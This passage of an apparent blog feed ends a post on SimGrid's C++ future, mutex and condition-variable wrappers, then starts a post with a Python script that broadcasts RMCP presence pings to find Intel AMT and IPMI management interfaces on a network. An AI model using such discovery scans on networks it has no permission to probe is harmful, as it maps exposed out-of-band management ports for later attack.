template<class F>\ntypename std::result_of<F()>::type kernelImmediate(F&& code)\n{\n  // If we are in the simulation kernel, we take the fast path and\n  // execute the code directly without simcall\n  // marshalling/unmarshalling/dispatch:\n  if (SIMIX_is_maestro())\n    return std::forward<F>(code)();\n\n  // If we are in the application, pass the code to the simulation\n  // kernel which executes it for us and reports the result:\n  typedef typename std::result_of<F()>::type R;\n  simgrid::xbt::Result<R> result;\n  simcall_run_kernel([&]{\n    xbt_assert(SIMIX_is_maestro(), \"Not in maestro\");\n    simgrid::xbt::fulfillPromise(result, std::forward<F>(code));\n  });\n  return result.get();\n}\n
\n\n\n

where Result<R> can store either a R or an exception.

\n

Example of usage:

\n
xbt_dict_t Host::properties() {\n  return simgrid::simix::kernelImmediate([&] {\n    simgrid::surf::HostImpl* surf_host =\n      this->extension<simgrid::surf::HostImpl>();\n    return surf_host->getProperties();\n  });\n}\n
\n\n\n

In this example, the kernelImmediate() call is not in user code but\nin the framework code. We do not expect the normal user to write\nsimulator kernel code. Those mechanisms are intended to be used by\nthe implementer of the framework in order to implement user\nprimitives.

\n

Blocking simcall

\n

The second generic simcall (simcall_run_blocking()) executes a function in\nthe SimGrid simulation kernel immediately but does not wake up the calling actor\nimmediately:

\n
void simcall_run_blocking(std::function<void()> const& code);\n\ntemplate<class F>\nvoid simcall_run_blocking(F& f)\n{\n  simcall_run_blocking(std::function<void()>(std::ref(f)));\n}\n
\n\n\n

The f function is expected to setup some callbacks in the simulation\nkernel which will wake up the actor (with\nsimgrid::simix::unblock(actor)) when the operation is completed.

\n

This is wrapped in a higher-level primitive as well. The\nkernelSync() function expects a function-object which is executed\nimmediately in the simulation kernel and returns a Future<T>. The\nsimulator blocks the actor and resumes it when the Future<T> becomes\nready with its result:

\n
template<class F>\nauto kernelSync(F code) -> decltype(code().get())\n{\n  typedef decltype(code().get()) T;\n  if (SIMIX_is_maestro())\n    xbt_die(\"Can't execute blocking call in kernel mode\");\n\n  smx_process_t self = SIMIX_process_self();\n  simgrid::xbt::Result<T> result;\n\n  simcall_run_blocking([&result, self, &code]{\n    try {\n      auto future = code();\n      future.then_([&result, self](simgrid::kernel::Future<T> value) {\n        // Propagate the result from the future\n        // to the simgrid::xbt::Result:\n        simgrid::xbt::setPromise(result, value);\n        simgrid::simix::unblock(self);\n      });\n    }\n    catch (...) {\n      // The code failed immediately. We can wake up the actor\n      // immediately with the exception:\n      result.set_exception(std::current_exception());\n      simgrid::simix::unblock(self);\n    }\n  });\n\n  // Get the result of the operation (which might be an exception):\n  return result.get();\n}\n
\n\n\n

A contrived example of this would be:

\n
int res = simgrid::simix::kernelSync([&] {\n  return kernel_wait_until(30).then(\n    [](simgrid::kernel::Future<void> future) {\n      return 42;\n    }\n  );\n});\n
\n\n\n

A more realistic example (implementing user-level primitives) would\nbe:

\n
sg_size_t File::read(sg_size_t size)\n{\n  return simgrid::simix::kernelSync([&] {\n    return file_->async_read(size);\n  });\n}\n
\n\n\n

Asynchronous operations

\n

We can write the related kernelAsync() which wakes up the actor immediately\nand returns a future to the actor. As this future is used in the actor context,\nit is a different future\n(simgrid::simix::Future instead of simgrid::kernel::Future)\nwhich implements a C++11 std::future wait-based API:

\n
template <class T>\nclass Future {\npublic:\n  Future() {}\n  Future(simgrid::kernel::Future<T> future) : future_(std::move(future)) {}\n  bool valid() const { return future_.valid(); }\n  T get();\n  bool is_ready() const;\n  void wait();\nprivate:\n  // We wrap an event-based kernel future:\n  simgrid::kernel::Future<T> future_;\n};\n
\n\n\n

The future.get() method is implemented as4:

\n
template<class T>\nT simgrid::simix::Future<T>::get()\n{\n  if (!valid())\n    throw std::future_error(std::future_errc::no_state);\n  smx_process_t self = SIMIX_process_self();\n  simgrid::xbt::Result<T> result;\n  simcall_run_blocking([this, &result, self]{\n    try {\n      // When the kernel future is ready...\n      this->future_.then_(\n        [this, &result, self](simgrid::kernel::Future<T> value) {\n          // ... wake up the process with the result of the kernel future.\n          simgrid::xbt::setPromise(result, value);\n          simgrid::simix::unblock(self);\n      });\n    }\n    catch (...) {\n      result.set_exception(std::current_exception());\n      simgrid::simix::unblock(self);\n    }\n  });\n  return result.get();\n}\n
\n\n\n

kernelAsync() simply \"\ud83d\ude09\" calls kernelImmediate() and wraps the\nsimgrid::kernel::Future into a simgrid::simix::Future:

\n
template<class F>\nauto kernelAsync(F code)\n  -> Future<decltype(code().get())>\n{\n  typedef decltype(code().get()) T;\n\n  // Execute the code in the simulation kernel and get the kernel future:\n  simgrid::kernel::Future<T> future =\n    simgrid::simix::kernelImmediate(std::move(code));\n\n  // Wrap the kernel future in a user future:\n  return simgrid::simix::Future<T>(std::move(future));\n}\n
\n\n\n

A contrived example of this would be:

\n
simgrid::simix::Future<int> future = simgrid::simix::kernelSync([&] {\n  return kernel_wait_until(30).then(\n    [](simgrid::kernel::Future<void> future) {\n      return 42;\n    }\n  );\n});\ndo_some_stuff();\nint res = future.get();\n
\n\n\n

A more realistic example (implementing user-level primitives) would\nbe:

\n
simgrid::simix::Future<sg_size_t> File::async_read(sg_size_t size)\n{\n  return simgrid::simix::kernelAsync([&] {\n    return file_->async_read(size);\n  });\n}\n
\n\n\n

kernelSync() could be rewritten as:

\n
template<class F>\nauto kernelSync(F code) -> decltype(code().get())\n{\n  return kernelAsync(std::move(code)).get();\n}\n
\n\n\n

The semantic is equivalent but this form would require two simcalls\ninstead of one to do the same job (one in kernelAsync() and one in\n.get()).

\n

Representing the simulated time

\n

SimGrid uses double for representing the simulated time:

\n\n

In contrast, all the C++ APIs use std::chrono::duration and\nstd::chrono::time_point. They are used in:

\n\n

We can define future.wait_for(duration) and future.wait_until(timepoint)\nfor our futures but for better compatibility with standard C++ code, we might\nwant to define versions expecting std::chrono::duration and\nstd::chrono::time_point.

\n

For time points, we need to define a clock (which meets the\nTrivialClock\nrequirements, see\n[time.clock.req]\nworking in the simulated time in the C++14 standard):

\n
struct SimulationClock {\n  using rep        = double;\n  using period     = std::ratio<1>;\n  using duration   = std::chrono::duration<rep, period>;\n  using time_point = std::chrono::time_point<SimulationClock, duration>;\n  static constexpr bool is_steady = true;\n  static time_point now()\n  {\n    return time_point(duration(SIMIX_get_clock()));\n  }\n};\n
\n\n\n

A time point in the simulation is a time point using this clock:

\n
template<class Duration>\nusing SimulationTimePoint =\n  std::chrono::time_point<SimulationClock, Duration>;\n
\n\n\n

This is used for example in simgrid::s4u::this_actor::sleep_for() and\nsimgrid::s4u::this_actor::sleep_until():

\n
void sleep_for(double duration)\n{\n  if (duration > 0)\n    simcall_process_sleep(duration);\n}\n\nvoid sleep_until(double timeout)\n{\n  double now = SIMIX_get_clock();\n  if (timeout > now)\n    simcall_process_sleep(timeout - now);\n}\n\ntemplate<class Rep, class Period>\nvoid sleep_for(std::chrono::duration<Rep, Period> duration)\n{\n  auto seconds =\n    std::chrono::duration_cast<SimulationClockDuration>(duration);\n  this_actor::sleep_for(seconds.count());\n}\n\ntemplate<class Duration>\nvoid sleep_until(const SimulationTimePoint<Duration>& timeout_time)\n{\n  auto timeout_native =\n    std::chrono::time_point_cast<SimulationClockDuration>(timeout_time);\n  this_actor::sleep_until(timeout_native.time_since_epoch().count());\n}\n
\n\n\n

Which means it is possible to use (since C++14):

\n
using namespace std::chrono_literals;\nsimgrid::s4u::actor::sleep_for(42s);\n
\n\n\n

Mutexes and condition variables

\n

Mutexes

\n

SimGrid has had a C-based API for mutexes and condition variables for\nsome time. These mutexes are different from the standard\nsystem-level mutex (std::mutex, pthread_mutex_t, etc.) because\nthey work at simulation-level. Locking on a simulation mutex does\nnot block the thread directly but makes a simcall\n(simcall_mutex_lock()) which asks the simulation kernel to wake the calling\nactor when it can get ownership of the mutex. Blocking directly at the\nOS level would deadlock the simulation.

\n

Reusing the C++ standard API for our simulation mutexes has many\nbenefits:

\n\n

We defined a reference-counted Mutex class for this (which supports\nthe Lockable\nrequirements, see\n[thread.req.lockable.req]\nin the C++14 standard):

\n
class Mutex {\n  friend ConditionVariable;\nprivate:\n  friend simgrid::simix::Mutex;\n  simgrid::simix::Mutex* mutex_;\n  Mutex(simgrid::simix::Mutex* mutex) : mutex_(mutex) {}\npublic:\n\n  friend void intrusive_ptr_add_ref(Mutex* mutex);\n  friend void intrusive_ptr_release(Mutex* mutex);\n  using Ptr = boost::intrusive_ptr<Mutex>;\n\n  // No copy:\n  Mutex(Mutex const&) = delete;\n  Mutex& operator=(Mutex const&) = delete;\n\n  static Ptr createMutex();\n\npublic:\n  void lock();\n  void unlock();\n  bool try_lock();\n};\n
\n\n\n

The methods are simply wrappers around existing simcalls:

\n
void Mutex::lock()\n{\n  simcall_mutex_lock(mutex_);\n}\n
\n\n\n

Using the same API as std::mutex (Lockable) means we can use existing\nC++-standard code such as std::unique_lock<Mutex> or\nstd::lock_guard<Mutex> for exception-safe mutex handling8:

\n
{\n  std::lock_guard<simgrid::s4u::Mutex> lock(*mutex);\n  sum += 1;\n}\n
\n\n\n

Condition Variables

\n

Similarly SimGrid already had simulation-level condition variables\nwhich can be exposed using the same API as std::condition_variable:

\n
class ConditionVariable {\nprivate:\n  friend s_smx_cond;\n  smx_cond_t cond_;\n  ConditionVariable(smx_cond_t cond) : cond_(cond) {}\npublic:\n\n  ConditionVariable(ConditionVariable const&) = delete;\n  ConditionVariable& operator=(ConditionVariable const&) = delete;\n\n  friend void intrusive_ptr_add_ref(ConditionVariable* cond);\n  friend void intrusive_ptr_release(ConditionVariable* cond);\n  using Ptr = boost::intrusive_ptr<ConditionVariable>;\n  static Ptr createConditionVariable();\n\n  void wait(std::unique_lock<Mutex>& lock);\n  template<class P>\n  void wait(std::unique_lock<Mutex>& lock, P pred);\n\n  // Wait functions taking a plain double as time:\n\n  std::cv_status wait_until(std::unique_lock<Mutex>& lock,\n    double timeout_time);\n  std::cv_status wait_for(\n    std::unique_lock<Mutex>& lock, double duration);\n  template<class P>\n  bool wait_until(std::unique_lock<Mutex>& lock,\n    double timeout_time, P pred);\n  template<class P>\n  bool wait_for(std::unique_lock<Mutex>& lock,\n    double duration, P pred);\n\n  // Wait functions taking a std::chrono time:\n\n  template<class Rep, class Period, class P>\n  bool wait_for(std::unique_lock<Mutex>& lock,\n    std::chrono::duration<Rep, Period> duration, P pred);\n  template<class Rep, class Period>\n  std::cv_status wait_for(std::unique_lock<Mutex>& lock,\n    std::chrono::duration<Rep, Period> duration);\n  template<class Duration>\n  std::cv_status wait_until(std::unique_lock<Mutex>& lock,\n    const SimulationTimePoint<Duration>& timeout_time);\n  template<class Duration, class P>\n  bool wait_until(std::unique_lock<Mutex>& lock,\n    const SimulationTimePoint<Duration>& timeout_time, P pred);\n\n  // Notify:\n\n  void notify_one();\n  void notify_all();\n\n};\n
\n\n\n

We currently accept both double (for simplicity and consistency with\nthe current codebase) and std::chrono types (for compatibility with\nC++ code) as durations and timepoints. One important thing to notice here is\nthat cond.wait_for() and cond.wait_until() work in the simulated time,\nnot in the real time.

\n

The simple cond.wait() and cond.wait_for() delegate to\npre-existing simcalls:

\n
void ConditionVariable::wait(std::unique_lock<Mutex>& lock)\n{\n  simcall_cond_wait(cond_, lock.mutex()->mutex_);\n}\n\nstd::cv_status ConditionVariable::wait_for(\n  std::unique_lock<Mutex>& lock, double timeout)\n{\n  // The simcall uses -1 for \"any timeout\" but we don't want this:\n  if (timeout < 0)\n    timeout = 0.0;\n\n  try {\n    simcall_cond_wait_timeout(cond_, lock.mutex()->mutex_, timeout);\n    return std::cv_status::no_timeout;\n  }\n  catch (xbt_ex& e) {\n\n    // If the exception was a timeout, we have to take the lock again:\n    if (e.category == timeout_error) {\n      try {\n        lock.mutex()->lock();\n        return std::cv_status::timeout;\n      }\n      catch (...) {\n        std::terminate();\n      }\n    }\n\n    std::terminate();\n  }\n  catch (...) {\n    std::terminate();\n  }\n}\n
\n\n\n

Other methods are simple wrappers around those two:

\n
template<class P>\nvoid ConditionVariable::wait(std::unique_lock<Mutex>& lock, P pred)\n{\n  while (!pred())\n    wait(lock);\n}\n\ntemplate<class P>\nbool ConditionVariable::wait_until(std::unique_lock<Mutex>& lock,\n  double timeout_time, P pred)\n{\n  while (!pred())\n    if (this->wait_until(lock, timeout_time) == std::cv_status::timeout)\n      return pred();\n  return true;\n}\n\ntemplate<class P>\nbool ConditionVariable::wait_for(std::unique_lock<Mutex>& lock,\n  double duration, P pred)\n{\n  return this->wait_until(lock,\n    SIMIX_get_clock() + duration, std::move(pred));\n}\n
\n\n\n

Conclusion

\n

We wrote two future implementations based on the std::future API:

\n\n

These futures are used to implement kernelSync() and kernelAsync() which\nexpose asynchronous operations in the simulation kernel to the actors.

\n

In addition, we wrote variations of some other C++ standard library\nclasses (SimulationClock, Mutex, ConditionVariable) which work in\nthe simulation:

\n\n

Reusing the same API as the C++ standard library is very useful because:

\n\n

This type of approach might be useful for other libraries which define\ntheir own contexts. An example of this is\nMordor, a I/O library using fibers\n(cooperative scheduling): it implements cooperative/fiber\nmutex,\nrecursive\nmutex\nwhich are compatible with the\nBasicLockable\nrequirements (see\n[thread.req.lockable.basic]\nin the C++14 standard).

\n

Appendix: useful helpers

\n

Result

\n

Result is like a mix of std::future and std::promise in a\nsingle-object without shared-state and synchronisation:

\n
template<class T>\nclass Result {\n  enum class ResultStatus {\n    invalid,\n    value,\n    exception,\n  };\npublic:\n  Result();\n  ~Result();\n  Result(Result const& that);\n  Result& operator=(Result const& that);\n  Result(Result&& that);\n  Result& operator=(Result&& that);\n  bool is_valid() const;\n  void reset();\n  void set_exception(std::exception_ptr e);\n  void set_value(T&& value);\n  void set_value(T const& value);\n  T get();\nprivate:\n  ResultStatus status_ = ResultStatus::invalid;\n  union {\n    T value_;\n    std::exception_ptr exception_;\n  };\n};\n
\n\n\n

Promise helpers

\n

Those helper are useful for dealing with generic future-based code:

\n
template<class R, class F>\nauto fulfillPromise(R& promise, F&& code)\n-> decltype(promise.set_value(code()))\n{\n  try {\n    promise.set_value(std::forward<F>(code)());\n  }\n  catch(...) {\n    promise.set_exception(std::current_exception());\n  }\n}\n\ntemplate<class P, class F>\nauto fulfillPromise(P& promise, F&& code)\n-> decltype(promise.set_value())\n{\n  try {\n    std::forward<F>(code)();\n    promise.set_value();\n  }\n  catch(...) {\n    promise.set_exception(std::current_exception());\n  }\n}\n\ntemplate<class P, class F>\nvoid setPromise(P& promise, F&& future)\n{\n  fulfillPromise(promise, [&]{ return std::forward<F>(future).get(); });\n}\n
\n\n\n

Task

\n

Task<R(F...)> is a type-erased callable object similar to\nstd::function<R(F...)> but works for move-only types. It is similar to\nstd::package_task<R(F...)> but does not wrap the result in a std::future<R>\n(it is not packaged).

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
std::functionstd::packaged_tasksimgrid::xbt::Task
CopyableYesNoNo
MovableYesYesYes
Callconstnon-constnon-const
Callablemultiple timesonceonce
Sets a promiseNoYesNo
\n

It could be implemented as:

\n
template<class T>\nclass Task {\nprivate:\n  std::packaged_task<T> task_;\npublic:\n\n  template<class F>\n  void Task(F f) :\n    task_(std::forward<F>(f))\n  {}\n\n  template<class... ArgTypes>\n  auto operator()(ArgTypes... args)\n  -> decltype(task_.get_future().get())\n  {\n    task_(std::forward<ArgTypes)(args)...);\n    return task_.get_future().get();\n  }\n\n};\n
\n\n\n

but we don't need a shared-state.

\n

This is useful in order to bind move-only type arguments:

\n
template<class F, class... Args>\nclass TaskImpl {\nprivate:\n  F code_;\n  std::tuple<Args...> args_;\n  typedef decltype(simgrid::xbt::apply(\n    std::move(code_), std::move(args_))) result_type;\npublic:\n  TaskImpl(F code, std::tuple<Args...> args) :\n    code_(std::move(code)),\n    args_(std::move(args))\n  {}\n  result_type operator()()\n  {\n    // simgrid::xbt::apply is C++17 std::apply:\n    return simgrid::xbt::apply(std::move(code_), std::move(args_));\n  }\n};\n\ntemplate<class F, class... Args>\nauto makeTask(F code, Args... args)\n-> Task< decltype(code(std::move(args)...))() >\n{\n  TaskImpl<F, Args...> task(\n    std::move(code), std::make_tuple(std::move(args)...));\n  return std::move(task);\n}\n
\n\n\n

Upate (2018-08-15): there is a\nproposal\nfor including yhis as std::unique_function in the C++ standard.\nIn addition to the implementations listed in the paper, there is also\nfolly::Function\nor stdlab::task.\nThere is a later proposal\nfor extending std::function\nwith non-copyable move-only types and one shot call\nwith eg. std::function<void()&&>.

\n
\n
\n
    \n
  1. \n

    The relationship between the SimGrid simulation kernel and the simulated\nactors is similar to the relationship between an OS kernel and the OS\nprocesses: the simulation kernel manages (schedules) the execution of the\nactors; the actors make requests to the simulation kernel using simcalls.\nHowever, both the simulation kernel and the actors currently run in the same\nOS process (and use same address space).\u00a0\u21a9

    \n
  2. \n
  3. \n

    This is the kind of futures that are available in ECMAScript which use\nthe same kind of never-blocking asynchronous model as our discrete event\nsimulator.\u00a0\u21a9

    \n
  4. \n
  5. \n

    Currently, we did not implement some features such as shared\nfutures.\u00a0\u21a9

    \n
  6. \n
  7. \n

    You might want to compare this method with simgrid::kernel::Future::get()\nwe showed previously: the method of the kernel future does not block and\nraises an error if the future is not ready; the method of the actor future\nblocks after having set a continuation to wake the actor when the future\nis ready.\u00a0\u21a9

    \n
  8. \n
  9. \n

    (which are related to the fact that we are in a non-blocking single-threaded\nsimulation engine)\u00a0\u21a9

    \n
  10. \n
  11. \n

    In the C++ standard library, std::future<T> is used by the consumer\nof the result. On the other hand, std::promise<T> is used by the\nproducer of the result. The consumer calls promise.set_value(42)\nor promise.set_exception(e) in order to set the result which will\nbe made available to the consumer by future.get().\u00a0\u21a9

    \n
  12. \n
  13. \n

    Calling the continuations from simulation loop means that we don't have\nto fear problems like invariants not being restored when the callbacks\nare called \"\ud83d\ude28\" or stack overflows triggered by deeply nested\ncontinuations chains \"\ud83d\ude30\". The continuations are all called in a\nnice and predictable place in the simulator with a nice and predictable\nstate \"\ud83d\ude0c\".\u00a0\u21a9

    \n
  14. \n
  15. \n

    std::lock() might kinda work too but it may not be such as good idea to\nuse it as it may use a deadlock avoidance algorithm such as\ntry-and-back-off.\nA backoff would probably uselessly wait in real time instead of simulated\ntime. The deadlock avoidance algorithm might as well add non-determinism\nin the simulation which we would like to avoid.\nstd::try_lock() should be safe to use though.\u00a0\u21a9

    \n
  16. \n
  17. \n

    There's an interesting library implementation in\nRust as well.\u00a0\u21a9

    \n
  18. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2016/07/11/intel-amt-discovery/", "title": "Intel AMT discovery", "url": "https://www.gabriel.urdhr.fr/2016/07/11/intel-amt-discovery/", "date_published": "2016-07-11T00:00:00+02:00", "date_modified": "2017-05-15T00:00:00+02:00", "tags": ["computer", "network", "amt", "python", "security"], "content_html": "

There's been some articles lately about Intel AMT and its impact on\nsecurity,\ntrust,\nprivacy\nand free-software.\nAMT supposed to be widely deployed in newest Intel hardware.\nSo I wanted to see if I could find some AMT devices in the wild.

\n

Update: 2017-05-15 Add references related to CVE-2017-5689 (AMT\n vulerability).

\n

What's AMT anyway?

\n

AMT is an Intel technology for\nout of band management\n(without cooperation of the OS)\nof a computer over the network even if the computer is turned off.\nIt can be used to do things such as:

\n\n

It implementats the DASH\nstandard and is similar to IPMI in terms of features.\nIt uses SOAP over HTTP\nwith some WS-* greatness\nand comes with bells and whistles such as\nintegration with Active Directory.

\n

When AMT is enabled, IP packets incoming on the builtin network adapter for some\nTCP and UDP ports are sent directly to the\nME\ninstead of reaching the OS.\nThe ME has its own processor and its own OS and can give access to the hardware\nover the network. Usually, the ME and the main system share the same network\ninterface, MAC address and IPv6 address.

\n

Relevant citation for DASH:

\n
\n

A physical system\u2019s out-of-band Management Access Point and the In-Band host\nshall share the MAC address and IPv4 address of the network interface.\nManageability traffic shall be routed to the MAP \nthrough the well known system ports defined by IANA.

\n
\n

Relevant citation for AMT:

\n
\n

TCP/UDP messages addressed to certain registered ports are routed to Intel\nAMT when those ports are enabled. Messages received on a wired LAN interface\ngo directly to Intel AMT. Messages received on a wireless interface go to the\nhost wireless driver. The driver detects the destination port and sends the\nmessage to Intel AMT.

\n
\n

My machine

\n

My work laptop has a MEI device and the system loads the MEI Linux\nmodule:

\n
\n$ lspci\n[...]\n00:16.0 Communication controller: Intel Corporation 7 Series/C210 Series Chipset Family MEI Controller #1 (rev 04)\n[...]\n\n$ lsmod | grep mei\nmei_me                 32768  0\nmei                    94208  1 mei_me\n\n$ ls -l /dev/mei*\ncrw------- 1 root root 246, 0 juil.  7 08:53 /dev/mei0\n\n$ grep mei /lib/modules/4.6.0-1-amd64/modules.alias\nalias pci:v00008086d00005A9Asv*sd*bc*sc*i* mei_me\nalias pci:v00008086d00001A9Asv*sd*bc*sc*i* mei_me\n[...]\nalias mei:pn544:0bb17a78-2a8e-4c50-94d4-50266723775c:*:* pn544_me\n\n$ cat /sys/bus/pci/drivers/mei_me/0000:00:16.0/uevent\nMAJOR=248\nMINOR=0\nDEVNAME=mei0\n
\n\n

MEI\nis a PCI-based interface to the ME from within the computer.

\n

However, there is no option to disable AMT in the BIOS on my laptop.\nApparently,\nAMT is not enabled\non this device even if this not\nabsolutely clear.\nThe hardware seems to be there though.

\n

AMT Discovery

\n

We can use the discovery mechanism of\nAMT\nin order to detect AMT devices on a network.\nThe AMT (and DASH) discovery uses\ntwo phases:

\n
    \n
  1. \n

    the first phase uses ASF RMCP;

    \n
  2. \n
  3. \n

    the second phase uses the WS-Management Identify method.

    \n
  4. \n
\n

The second phase is not so useful so I'll focus on the first one.

\n

Implementation

\n

The first phase is quite simple:

\n
    \n
  1. \n

    the client sends a (possibly) broadcast RMCP Presence Ping message over\n UDP port 623 (asf-rmcp);

    \n
  2. \n
  3. \n

    the nodes supporting ASF (such as DASH/AMT and IPMI nodes) send a\n RMCP Presence Pong.

    \n
  4. \n
\n

RMCP Header:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SizeField
1BVersion (0x6 for RMCP 1.0)
1BReserved
1BSequence number (0--254, 255 when no no acknowledge is needed)
1BClass of Message
Bit 7, 1 for acknowledge
Bits 6:4, reserved
Bits 3:0, 6 for ASF, 7 for IPMI, etc.
\n

All messages which are not acknowledges have a\nRMCP data\nfield after the header:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SizeField
4BIANA Entreprise Number, servces as a namespace for the message type (4542 for ASF-RMCP)
1BMessage Type (for ASF-RMCP, we have 0x80 for Presence Ping, 0x40 for Presence Pong)
1BMessage Tag
1BReserved
1BData Length
VarData (payload)
\n

We can handle RMCP messages with:

\n
ASF_RMCP_VERSION1 = 0x6\nIANA_ASF = 4542\nASF_RMCP_FORMAT = \"!BBBBIBBBB\"\n\n# RCMP ASF message (not ack)\nclass Message:\n    def __init__(self):\n        self.version = ASF_RMCP_VERSION1\n        self.reserved = 0x00\n        self.seqno = 0x00\n        self.message_class = 0x00\n        self.entreprise_number = IANA_ASF\n        self.message_type = 0x00\n        self.message_tag = 0x00\n        self.reserved = 0x00\n        self.data = bytearray()\n\n    def load(self, message):\n        if (len(message) < struct.calcsize(ASF_RMCP_FORMAT)):\n            raise \"Message too small\"\n        (self.version, self.reserved, self.seqno, self.message_class,\n         self.entreprise_number, self.message_type, self.message_tag,\n         self.reserved, data_length) = \\\n            struct.unpack_from(ASF_RMCP_FORMAT, message)\n        if len(message) != data_length + struct.calcsize(ASF_RMCP_FORMAT):\n            raise \"Bad length\"\n        rmcp_size = struct.calcsize(ASF_RMCP_FORMAT)\n        self.data = bytearray(memoryview(message)[rmcp_size:])\n\n    def to_bytes(self):\n        size = struct.calcsize(ASF_RMCP_FORMAT) + len(self.data)\n        res = bytearray(size)\n        struct.pack_into(ASF_RMCP_FORMAT, res, 0,\n                         self.version, self.reserved, self.seqno,\n                         self.message_class, self.entreprise_number,\n                         self.message_type, self.message_tag, self.reserved,\n                         len(self.data))\n        memoryview(res)[struct.calcsize(ASF_RMCP_FORMAT):] = self.data\n        return res\n
\n\n\n

For Presence Ping, there is no payload. For Presence\nPong,\nthe payload is:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SizeField
4BIANA Entreprise Number (4542 if not OEM specific-things are used)
4BOEM Defined
1BSupported Entities
Bit 7, set if IPMI is supported
Bits 6:4, reserved
Bits 3:0, 1 for ASF version 1.0
1BSupported interactions
Bit 5: set if DASH (AMT) is supported
5BReserved
\n

We can handle Pong Presence data with:

\n
ASF_RMCP_PONG_FORMAT = \"!IIBBBBBBBB\"\n\nclass PongData:\n    def __init__(self, payload):\n        if struct.calcsize(ASF_RMCP_PONG_FORMAT) != len(payload):\n            print(\"Bad length for pong payload expected %i but was %i\" %\n                  (struct.calcsize(ASF_RMCP_PONG_FORMAT), len(payload)))\n        (self.entreprise_number, self.oem_defined, self.supported_entities,\n         self.supported_interactions, self.reserved1,\n         self.reserved2, self.reserved3, self.reserved4, self.reserved5,\n         self.reserved6) = struct.unpack_from(ASF_RMCP_PONG_FORMAT, payload)\n\n    def ipmi(self):\n        return (self.supported_entities & 127) != 0\n\n    def asf(self):\n        return (self.supported_entities & 15) == 1\n\n    def dash(self):\n        return (self.supported_interactions & 32) != 0\n\n    def features(self):\n        res = []\n        if self.ipmi():\n            res.append(\"ipmi\")\n        if self.asf():\n            res.append(\"asf\")\n        if self.dash():\n            res.append(\"dash\")\n        return res\n
\n\n\n

We send a Presence Ping message to some (possibly broadcast) address:

\n
ASF_RMCP_PORT = 623\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PING = 0x80\n\nm = Message()\nm.message_class = ASF_RMCP_VERSION1\nm.message_type = ASF_RMCP_MESSAGE_TYPE_PRESENCE_PING\n\nsock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\nsock.sendto(m.to_bytes(), (address, ASF_RMCP_PORT))\n
\n\n\n

And then we process the messages:

\n
ASF_RMCP_MESSAGE_TYPE_PRESENCE_PONG = 0x40\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PING_ACK = 0x86\n\nsock.settimeout(1)\n\ntry:\n    while True:\n        data, addr = sock.recvfrom(1024)\n        logging.debug(\"From \" + str(addr[0]) + \": \" + str(data))\n        if len(data) == 4 and data[0] == ASF_RMCP_VERSION1 and data[2] == 0 \\\n                and data[3] == ASF_RMCP_MESSAGE_TYPE_PRESENCE_PING_ACK:\n            logging.debug(\"Ack from \" + str(addr[0]))\n            continue\n        try:\n            m.load(data)\n        except:\n            continue\n        if m.message_type == ASF_RMCP_MESSAGE_TYPE_PRESENCE_PONG:\n            # Pong:\n            print(str(addr[0]))\n            pongData = PongData(m.data)\n            features = pongData.features()\n            print(\"\\tEntreprise: %s\" %\n                  entreprise_name(pongData.entreprise_number))\n            if len(features) != 0:\n                print(\"\\tFeatures: %s\" % \",\".join(features))\nexcept socket.timeout:\n    pass\n
\n\n\n

Full code

\n

Here's the full code:

\n
#!/usr/bin/env python3\n# Use ASF RMCP to discover RMCP-aware nodes (such as AMT/AMT or IPMI)\n# Keywords: DMTF, ASF RMCP, DASH, AMT, IPMI.\n\nimport socket\nimport ctypes\nimport struct\nimport sys\nimport logging\nimport ipaddress\n\nASF_RMCP_PORT = 623\nASF_RMCP_FORMAT = \"!BBBBIBBBB\"\nASF_RMCP_PONG_FORMAT = \"!IIBBBBBBBB\"\nASF_RMCP_VERSION1 = 0x6\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PONG = 0x40\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PING = 0x80\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PING_ACK = 0x86\nIANA_ASF = 4542\n\naddress = sys.argv[1]\nif ipaddress.ip_address(address).version == 4:\n    address = \"::ffff:\" + address\n\nentreprise_names = {\n    343: \"Intel\",\n    3704: \"AMD\",\n    4542: \"Alerting Specifications Forum\",\n}\n\n\ndef entreprise_name(n):\n    if n in entreprise_names:\n        return entreprise_names[n]\n    else:\n        return str(n)\n\n\n# RCMP ASF message (not ack)\nclass Message:\n    def __init__(self):\n        self.version = ASF_RMCP_VERSION1\n        self.reserved = 0x00\n        self.seqno = 0x00\n        self.message_class = 0x00\n        self.entreprise_number = IANA_ASF\n        self.message_type = 0x00\n        self.message_tag = 0x00\n        self.reserved = 0x00\n        self.data = bytearray()\n\n    def load(self, message):\n        if (len(message) < struct.calcsize(ASF_RMCP_FORMAT)):\n            raise \"Message too small\"\n        (self.version, self.reserved, self.seqno, self.message_class,\n         self.entreprise_number, self.message_type, self.message_tag,\n         self.reserved, data_length) = \\\n            struct.unpack_from(ASF_RMCP_FORMAT, message)\n        if len(message) != data_length + struct.calcsize(ASF_RMCP_FORMAT):\n            raise \"Bad length\"\n        rmcp_size = struct.calcsize(ASF_RMCP_FORMAT)\n        self.data = bytearray(memoryview(message)[rmcp_size:])\n\n    def to_bytes(self):\n        size = struct.calcsize(ASF_RMCP_FORMAT) + len(self.data)\n        res = bytearray(size)\n        struct.pack_into(ASF_RMCP_FORMAT, res, 0,\n                         self.version, self.reserved, self.seqno,\n                         self.message_class, self.entreprise_number,\n                         self.message_type, self.message_tag, self.reserved,\n                         len(self.data))\n        memoryview(res)[struct.calcsize(ASF_RMCP_FORMAT):] = self.data\n        return res\n\n\nclass PongData:\n    def __init__(self, payload):\n        if struct.calcsize(ASF_RMCP_PONG_FORMAT) != len(payload):\n            print(\"Bad length for pong payload expected %i but was %i\" %\n                  